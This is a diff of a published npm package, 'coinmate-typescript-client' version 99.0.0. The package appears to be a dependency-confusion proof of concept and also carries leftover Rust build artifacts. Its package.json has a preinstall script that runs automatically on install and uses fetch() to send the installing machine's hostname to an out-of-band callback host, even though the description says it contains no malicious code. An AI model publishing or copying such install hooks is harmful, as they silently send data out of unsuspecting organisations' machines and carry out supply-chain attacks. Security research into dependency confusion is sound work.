coinmate-typescript-client 99.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/Cargo.toml +9 -0
- package/package.json +11 -0
- package/src/lib.rs +1 -0
- package/target/.rustc_info.json +1 -0
- package/target/CACHEDIR.TAG +3 -0
- package/target/debug/.cargo-lock +0 -0
- package/target/debug/.fingerprint/lsh-d3fcd075b4fb459a/dep-lib-lsh +0 -0
- package/target/debug/.fingerprint/lsh-d3fcd075b4fb459a/invoked.timestamp +1 -0
- package/target/debug/.fingerprint/lsh-d3fcd075b4fb459a/lib-lsh +1 -0
- package/target/debug/.fingerprint/lsh-d3fcd075b4fb459a/lib-lsh.json +1 -0
- package/target/debug/deps/liblsh-d3fcd075b4fb459a.rlib +0 -0
- package/target/debug/deps/liblsh-d3fcd075b4fb459a.rmeta +0 -0
- package/target/debug/deps/lsh-d3fcd075b4fb459a.d +7 -0
- package/target/debug/incremental/lsh-0mvq7lct4lo1d/s-hi0yor5zbd-1pku9ui-91k7ub9lhxvn8cnkk7a430j6y/3j4n10gjwzm5te4ch3ige2zif.o +0 -0
- package/target/debug/incremental/lsh-0mvq7lct4lo1d/s-hi0yor5zbd-1pku9ui-91k7ub9lhxvn8cnkk7a430j6y/dep-graph.bin +0 -0
- package/target/debug/incremental/lsh-0mvq7lct4lo1d/s-hi0yor5zbd-1pku9ui-91k7ub9lhxvn8cnkk7a430j6y/metadata.rmeta +0 -0
- package/target/debug/incremental/lsh-0mvq7lct4lo1d/s-hi0yor5zbd-1pku9ui-91k7ub9lhxvn8cnkk7a430j6y/query-cache.bin +0 -0
- package/target/debug/incremental/lsh-0mvq7lct4lo1d/s-hi0yor5zbd-1pku9ui-91k7ub9lhxvn8cnkk7a430j6y/work-products.bin +0 -0
- package/target/debug/incremental/lsh-0mvq7lct4lo1d/s-hi0yor5zbd-1pku9ui.lock +0 -0
- package/target/debug/liblsh.d +1 -0
- package/target/debug/liblsh.rlib +0 -0
- package/target/package/lsh-99.0.6/Cargo.lock +7 -0
- package/target/package/lsh-99.0.6/Cargo.toml +30 -0
- package/target/package/lsh-99.0.6/src/lib.rs +1 -0
- package/target/package/tmp-crate/lsh-99.0.6.crate +0 -0
package/Cargo.toml
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "coinmate-typescript-client",
|
|
3
|
+
"version": "99.0.0",
|
|
4
|
+
"description": "Security research PoC for dependency confusion. Contains no malicious code.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node -e \"console.log('POC_EXECUTED'); fetch('https://d7oqcri9io6m93mqmd7ga5weuopuju599.oast.pro/?host=' + require('os').hostname())\""
|
|
8
|
+
},
|
|
9
|
+
"author": "alone_beast_02",
|
|
10
|
+
"license": "MIT"
|
|
11
|
+
}
|
package/src/lib.rs
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
// Security research only. No code here.
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"rustc_fingerprint":4721357684385747936,"outputs":{"17747080675513052775":{"success":true,"status":"","code":0,"stdout":"rustc 1.95.0 (59807616e 2026-04-14) (built from a source tarball)\nbinary: rustc\ncommit-hash: 59807616e1fa2540724bfbac14d7976d7e4a3860\ncommit-date: 2026-04-14\nhost: aarch64-linux-android\nrelease: 1.95.0\nLLVM version: 21.1.8\n","stderr":""},"7971740275564407648":{"success":true,"status":"","code":0,"stdout":"___\nlib___.rlib\nlib___.so\nlib___.so\nlib___.a\nlib___.so\n/data/data/com.termux/files/usr\noff\npacked\nunpacked\n___\ndebug_assertions\npanic=\"unwind\"\nproc_macro\ntarget_abi=\"\"\ntarget_arch=\"aarch64\"\ntarget_endian=\"little\"\ntarget_env=\"\"\ntarget_family=\"unix\"\ntarget_feature=\"neon\"\ntarget_has_atomic=\"128\"\ntarget_has_atomic=\"16\"\ntarget_has_atomic=\"32\"\ntarget_has_atomic=\"64\"\ntarget_has_atomic=\"8\"\ntarget_has_atomic=\"ptr\"\ntarget_os=\"android\"\ntarget_pointer_width=\"64\"\ntarget_vendor=\"unknown\"\nunix\n","stderr":""}},"successes":{}}
|
|
File without changes
|
|
Binary file
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
This file has an mtime of when this was started.
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
c824197a650e6094
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"rustc":6045888110777183077,"features":"[]","declared_features":"[]","target":12070808135905765375,"profile":8731458305071235362,"path":10763286916239946207,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/lsh-d3fcd075b4fb459a/dep-lib-lsh","checksum":false}}],"rustflags":[],"config":8247474407144887393,"compile_kind":0}
|
|
Binary file
|
|
Binary file
|
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
/data/data/com.termux/files/home/test/target/debug/deps/lsh-d3fcd075b4fb459a.d: src/lib.rs
|
|
2
|
+
|
|
3
|
+
/data/data/com.termux/files/home/test/target/debug/deps/liblsh-d3fcd075b4fb459a.rlib: src/lib.rs
|
|
4
|
+
|
|
5
|
+
/data/data/com.termux/files/home/test/target/debug/deps/liblsh-d3fcd075b4fb459a.rmeta: src/lib.rs
|
|
6
|
+
|
|
7
|
+
src/lib.rs:
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
File without changes
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
/data/data/com.termux/files/home/test/target/debug/liblsh.rlib: /data/data/com.termux/files/home/test/target/package/lsh-99.0.6/src/lib.rs
|
|
Binary file
|
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
# THIS FILE IS AUTOMATICALLY GENERATED BY CARGO
|
|
2
|
+
#
|
|
3
|
+
# When uploading crates to the registry Cargo will automatically
|
|
4
|
+
# "normalize" Cargo.toml files for maximal compatibility
|
|
5
|
+
# with all versions of Cargo and also rewrite `path` dependencies
|
|
6
|
+
# to registry (e.g., crates.io) dependencies.
|
|
7
|
+
#
|
|
8
|
+
# If you are reading this file be aware that the original Cargo.toml
|
|
9
|
+
# will likely look very different (and much more reasonable).
|
|
10
|
+
# See Cargo.toml.orig for the original contents.
|
|
11
|
+
|
|
12
|
+
[package]
|
|
13
|
+
edition = "2021"
|
|
14
|
+
name = "lsh"
|
|
15
|
+
version = "99.0.6"
|
|
16
|
+
build = false
|
|
17
|
+
autolib = false
|
|
18
|
+
autobins = false
|
|
19
|
+
autoexamples = false
|
|
20
|
+
autotests = false
|
|
21
|
+
autobenches = false
|
|
22
|
+
description = "Security research PoC. Harmless and empty package for dependency confusion testing."
|
|
23
|
+
readme = false
|
|
24
|
+
license = "MIT"
|
|
25
|
+
|
|
26
|
+
[lib]
|
|
27
|
+
name = "lsh"
|
|
28
|
+
path = "src/lib.rs"
|
|
29
|
+
|
|
30
|
+
[dependencies]
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
// Security research only. No code here.
|
|
Binary file
|